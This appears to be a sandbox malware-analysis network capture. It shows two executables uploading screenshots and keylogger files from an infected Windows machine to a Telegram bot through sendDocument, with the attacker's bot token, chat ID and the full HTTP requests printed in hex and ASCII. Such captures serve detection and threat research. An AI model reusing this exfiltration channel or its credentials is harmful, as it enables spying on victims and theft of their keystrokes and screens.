f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:24 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:28 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:28 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49836	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:25 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:25 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 63 4f 61 78 72 58 44 56 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotcOaxrXDV.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:28:25 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:25 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:25 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:28:25 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:25 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:25 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:25 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:28:25 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:25 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:29 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:29 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49848	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:30 UTC	556	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 1525 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:30 UTC	1525	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 48 79 61 4c 75 59 7a 45 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 31 36 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 31 36 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 31 36 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataHyaLuYzE.txt"Content-Type: application/octet-stream[08:28:16]<<Program Manager>>[08:28:16]<<Program Manager>>[08:28:16]<<Program Mana
2024-12-03 13:28:30 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:30 GMT Content-Type: application/json Content-Length: 547 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:28:30 UTC	547	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 35 31 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44 Data Ascii: {"ok":true,"result":{"message_id":3892,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232510,"document":{"file_name":"KeyD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49850	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:30 UTC	556	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 1525 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:30 UTC	1525	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 77 6f 61 75 6c 49 55 63 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 31 36 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 31 36 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 31 36 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDatawoaulIUc.txt"Content-Type: application/octet-stream[08:28:16]<<Program Manager>>[08:28:16]<<Program Manager>>[08:28:16]<<Program Mana
2024-12-03 13:28:31 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:31 GMT Content-Type: application/json Content-Length: 548 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:28:31 UTC	548	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 35 31 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44 Data Ascii: {"ok":true,"result":{"message_id":3893,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232511,"document":{"file_name":"KeyD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49861	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:35 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:35 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 6c 49 66 61 6a 5a 4d 78 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotlIfajZMx.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
